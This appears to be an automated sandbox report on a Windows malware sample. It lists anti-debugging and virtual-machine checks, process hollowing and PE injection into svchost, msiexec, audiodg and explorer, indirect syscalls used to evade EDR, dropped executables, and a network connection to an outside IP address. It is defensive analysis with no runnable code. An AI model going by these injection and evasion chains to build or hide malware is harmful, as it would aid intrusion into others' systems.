Source: C:\Windows\System32\msiexec.exe Thread delayed: delay time: 50000 Jump to behavior
Source: C:\Windows\System32\msiexec.exe Thread delayed: delay time: 50000 Jump to behavior
Source: C:\Windows\explorer.exe Thread delayed: delay time: 90000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000004.00000002.3078727847.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: svchost.exe, 00000002.00000002.3071197547.000001301D093000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWMSAFD L2CAP [Bluetooth]RSVP UDPv6 Service Provider
Source: explorer.exe, 00000004.00000003.2515139841.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000004.00000003.2515139841.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000004.00000002.3078727847.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000004.00000002.3070194848.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000004.00000002.3074143855.00000000079FB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.1849997060.0000000009977000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: svchost.exe, 00000002.00000002.3070446353.000001301D036000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@4
Source: explorer.exe, 00000004.00000000.1847603303.00000000078AD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000004.00000003.2515139841.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: svchost.exe, 00000002.00000002.3071036945.000001301D080000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1849441067.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2515139841.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3077647961.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3077647961.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1849441067.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2515139841.00000000097D4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000004.00000000.1849997060.0000000009977000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000004.00000002.3074143855.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1847603303.0000000007A34000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000004.00000002.3070194848.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000004.00000002.3077534683.0000000009660000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000004.00000002.3070194848.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\svchost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\explorer.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\audiodg.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\audiodg.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\audiodg.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\msiexec.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\msiexec.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\msiexec.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\audiodg.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF63A833120 IsDebuggerPresent,GetCurrentProcess,CheckRemoteDebuggerPresent, 0_2_00007FF63A833120
Found API chain indicative of debugger detection
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Debugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleep
Source: C:\Users\user\Desktop\file.exe Debugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleep
Source: C:\Windows\System32\audiodg.exe Debugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleep
Source: C:\Windows\System32\svchost.exe Debugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleep
Source: C:\Windows\System32\msiexec.exe Debugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleep
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\System32\audiodg.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\System32\svchost.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\System32\svchost.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\System32\audiodg.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\System32\audiodg.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\System32\svchost.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process queried: DebugPort Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF63A833120 IsDebuggerPresent,GetCurrentProcess,CheckRemoteDebuggerPresent, 0_2_00007FF63A833120
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\explorer.exe Code function: 4_2_0E916624 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 4_2_0E916624
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Windows\explorer.exe Code function: 4_2_0E8F7CF0 CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,Thread32Next,CloseHandle, 4_2_0E8F7CF0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF63A831050 LoadLibraryA,GetProcAddress, 0_2_00007FF63A831050
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF63A832ED0 GetProcessHeap,HeapFree, 0_2_00007FF63A832ED0
Enables debug privileges
Source: C:\Windows\System32\audiodg.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\svchost.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\explorer.exe Code function: 4_2_0F4CF348 InitializeCriticalSectionAndSpinCount,SetUnhandledExceptionFilter, 4_2_0F4CF348
Source: C:\Windows\explorer.exe Code function: 4_2_0F4CF398 SetLastError,SetUnhandledExceptionFilter, 4_2_0F4CF398
Source: C:\Windows\explorer.exe Code function: 4_2_10D8F398 SetLastError,SetUnhandledExceptionFilter, 4_2_10D8F398
Source: C:\Windows\explorer.exe Code function: 4_2_10D8F348 InitializeCriticalSectionAndSpinCount,SetUnhandledExceptionFilter, 4_2_10D8F348
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F3F9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_00007FF69F3F9924
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F3EC62C SetUnhandledExceptionFilter, 17_2_00007FF69F3EC62C
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F3EC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_00007FF69F3EC44C
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F3EBBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 17_2_00007FF69F3EBBC0
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F3F9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_00007FF69F3F9924
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F3EC62C SetUnhandledExceptionFilter, 18_2_00007FF69F3EC62C
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F3EC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_00007FF69F3EC44C
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FF69F3EBBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 18_2_00007FF69F3EBBC0
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC90F20 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_00007FFDFFC90F20
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFDFFC6A184 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 18_2_00007FFDFFC6A184
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFE13316810 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_00007FFE13316810
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFE13315DF8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 18_2_00007FFE13315DF8
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFE133169F8 SetUnhandledExceptionFilter, 18_2_00007FFE133169F8
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFE1333D414 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 18_2_00007FFE1333D414
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFE148B4A34 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 18_2_00007FFE148B4A34
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 18_2_00007FFE148B5054 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_00007FFE148B5054
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: 4A64.tmp.x.exe.4.dr Jump to dropped file
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 176.111.174.140 80 Jump to behavior
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\file.exe Memory allocated: C:\Windows\System32\svchost.exe base: 7FF6EEF20000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: C:\Windows\System32\msiexec.exe base: 7FF7F2D00000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: C:\Windows\System32\audiodg.exe base: 7FF6626D0000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory allocated: C:\Windows\System32\svchost.exe base: 7FF6EEF20000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory allocated: C:\Windows\System32\msiexec.exe base: 7FF7F2D00000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory allocated: C:\Windows\System32\audiodg.exe base: 7FF6626D0000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory allocated: C:\Windows\System32\audiodg.exe base: 7FF6626D0000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory allocated: C:\Windows\System32\msiexec.exe base: 7FF7F2D00000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory allocated: C:\Windows\System32\svchost.exe base: 7FF6EEF20000 protect: page execute and read and write Jump to behavior
Contains functionality to inject code into remote processes
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF63A831F8C GetModuleFileNameW,CreateProcessW,CreateFileW,GetFileSize,CloseHandle,VirtualAlloc,CloseHandle,ReadFile,VirtualFree,CloseHandle,CloseHandle,GetThreadContext,VirtualFree,ReadProcessMemory,GetModuleHandleA,GetProcAddress,NtUnmapViewOfSection,VirtualFree,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,WriteProcessMemory,VirtualFree,RtlCompareMemory,ReadProcessMemory,WriteProcessMemory,VirtualFree,WriteProcessMemory,SetThreadContext,VirtualFree,ResumeThread,VirtualFree,VirtualFree, 0_2_00007FF63A831F8C
Contains functionality to inject threads in other processes
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF63A832BFC VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread, 0_2_00007FF63A832BFC
Source: C:\Windows\System32\svchost.exe Code function: 2_2_00007FF6EEF22BFC VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread, 2_2_00007FF6EEF22BFC
Source: C:\Windows\explorer.exe Code function: 4_2_0E92F6B0 free,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread, 4_2_0E92F6B0
Source: C:\Windows\explorer.exe Code function: 4_2_0E8F4420 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread, 4_2_0E8F4420
Source: C:\Windows\explorer.exe Code function: 4_2_0E8F3320 OpenProcess,GetModuleHandleA,GetProcAddress,CloseHandle,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,VirtualFreeEx,CloseHandle, 4_2_0E8F3320
Source: C:\Windows\explorer.exe Code function: 4_2_0F4DF6B0 free,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread, 4_2_0F4DF6B0
Source: C:\Windows\explorer.exe Code function: 4_2_0F4A4420 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread, 4_2_0F4A4420
Source: C:\Windows\explorer.exe Code function: 4_2_0F4A3320 OpenProcess,GetModuleHandleA,GetProcAddress,CloseHandle,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,VirtualFreeEx,CloseHandle, 4_2_0F4A3320
Source: C:\Windows\explorer.exe Code function: 4_2_10D63320 OpenProcess,GetModuleHandleA,GetProcAddress,CloseHandle,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,VirtualFreeEx,CloseHandle, 4_2_10D63320
Source: C:\Windows\explorer.exe Code function: 4_2_10D64420 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread, 4_2_10D64420
Source: C:\Windows\explorer.exe Code function: 4_2_10D9F6B0 free,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread, 4_2_10D9F6B0
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Code function: 5_2_00007FF7821C2BFC VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread, 5_2_00007FF7821C2BFC
Source: C:\Windows\System32\audiodg.exe Code function: 7_2_00007FF6626D2BFC VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread, 7_2_00007FF6626D2BFC
Source: C:\Windows\System32\msiexec.exe Code function: 8_2_00007FF7F2D02BFC VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread, 8_2_00007FF7F2D02BFC
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\audiodg.exe Thread created: C:\Windows\explorer.exe EIP: C3694E0 Jump to behavior
Source: C:\Windows\System32\svchost.exe Thread created: C:\Windows\explorer.exe EIP: A0394E0 Jump to behavior
Source: C:\Windows\System32\msiexec.exe Thread created: C:\Windows\explorer.exe EIP: E8B94E0 Jump to behavior
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe NtUnmapViewOfSection: Indirect: 0x7FF7821C2320 Jump to behavior
Source: C:\Users\user\Desktop\file.exe NtUnmapViewOfSection: Indirect: 0x7FF63A832320 Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\System32\svchost.exe base: 7FF6EEF20000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D00000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\System32\audiodg.exe base: 7FF6626D0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\audiodg.exe Memory written: C:\Windows\explorer.exe base: C350000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\svchost.exe Memory written: C:\Windows\explorer.exe base: A020000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\msiexec.exe Memory written: C:\Windows\explorer.exe base: E8A0000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\svchost.exe base: 7FF6EEF20000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D00000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\audiodg.exe base: 7FF6626D0000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\audiodg.exe base: 7FF6626D0000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D00000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\svchost.exe base: 7FF6EEF20000 value starts with: 4D5A Jump to behavior
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\audiodg.exe Memory written: PID: 2580 base: C350000 value: 4D Jump to behavior
Source: C:\Windows\System32\svchost.exe Memory written: PID: 2580 base: A020000 value: 4D Jump to behavior
Source: C:\Windows\System32\msiexec.exe Memory written: PID: 2580 base: E8A0000 value: 4D Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\file.exe Thread register set: target process: 7040 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread register set: target process: 7076 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread register set: target process: 7020 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Thread register set: target process: 6976 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Thread register set: target process: 6992 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Thread register set: target process: 6996 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Thread register set: target process: 1272 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Thread register set: target process: 1068 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Thread register set: target process: 744 Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\file.exe Section unmapped: C:\Windows\System32\svchost.exe base address: 7FF6EEF20000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section unmapped: C:\Windows\System32\msiexec.exe base address: 7FF7F2D00000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section unmapped: C:\Windows\System32\audiodg.exe base address: 7FF6626D0000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Section unmapped: C:\Windows\System32\svchost.exe base address: 7FF6EEF20000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Section unmapped: C:\Windows\System32\msiexec.exe base address: 7FF7F2D00000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Section unmapped: C:\Windows\System32\audiodg.exe base address: 7FF6626D0000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Section unmapped: C:\Windows\System32\audiodg.exe base address: 7FF6626D0000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Section unmapped: C:\Windows\System32\msiexec.exe base address: 7FF7F2D00000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Section unmapped: C:\Windows\System32\svchost.exe base address: 7FF6EEF20000 Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\System32\svchost.exe base: 7FF6EEF20000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\System32\svchost.exe base: 7FF6EEF21000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\System32\svchost.exe base: 7FF6EEF25000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\System32\svchost.exe base: 7FF6EEF27000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\System32\svchost.exe base: 7FF6EEF28000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\System32\svchost.exe base: 7FF6EEF29000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\System32\svchost.exe base: 438968010 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D00000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D01000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D05000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D07000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D08000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\System32\msiexec.exe base: 7FF7F2D09000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\System32\msiexec.exe base: 2693452010 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\System32\audiodg.exe base: 7FF6626D0000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\System32\audiodg.exe base: 7FF6626D1000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\System32\audiodg.exe base: 7FF6626D5000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\System32\audiodg.exe base: 7FF6626D7000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\System32\audiodg.exe base: 7FF6626D8000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\System32\audiodg.exe base: 7FF6626D9000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\System32\audiodg.exe base: 6A425CE010 Jump to behavior
Source: C:\Windows\System32\audiodg.exe Memory written: C:\Windows\explorer.exe base: C350000 Jump to behavior
Source: C:\Windows\System32\svchost.exe Memory written: C:\Windows\explorer.exe base: A020000 Jump to behavior
Source: C:\Windows\System32\msiexec.exe Memory written: C:\Windows\explorer.exe base: E8A0000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\svchost.exe base: 7FF6EEF20000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Memory written: C:\Windows\System32\svchost.exe base: 7FF6EEF21000 Jump to behavior
